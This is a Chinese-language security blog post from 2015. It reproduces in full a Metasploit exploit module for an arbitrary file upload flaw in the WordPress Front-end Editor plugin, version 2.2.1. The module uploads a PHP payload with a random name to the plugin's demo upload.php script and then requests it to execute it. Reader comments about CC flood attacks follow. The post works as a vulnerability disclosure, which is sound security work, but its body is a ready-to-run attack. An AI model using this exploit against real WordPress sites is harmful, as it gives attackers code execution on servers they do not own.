WordPress Front-end Editor上传漏洞

Description:
The WordPress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it’s own file upload mechanism instead of the wordpress api it’s possible to upload any file type.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The WordPress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the wordpress
          api it's possible to upload any file type.
      },
      'Author'         =>
        [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))
  end
 
  def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
  end
 
  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'    => 'application/octet-stream',
      'headers'  => {
        'X-File-Name' => "#{filename}"
      },
      'data' => payload.encoded
    )
 
    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
 
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
      5
    )
  end
end

本文固定链接: https://www.unhonker.com/bug/1751.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年06月18日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Front-end Editor上传漏洞 | 90' s Blog|关注网络信息安全
关键字:

WordPress Front-end Editor上传漏洞:目前有3 条留言

  1. 沙发
    剩月零风:

    博主 这两个月我WP网站的攻击很猛 被CC了 用百度云加速强力防护去验证用户浏览器才有用 高级防护照样透过 跟你现在网站一样 何解? 是不是WP的漏洞导致的?

    2016-02-22 21:53
    • unhonker:

      C你有很多方法,何必局限于一种思路呢。 建议你了解下CC

      2016-02-25 12:43
    • unhonker:

      被CC和漏洞的关系不是很大

      2016-03-22 12:43

发表评论

您必须 [ 登录 ] 才能发表留言!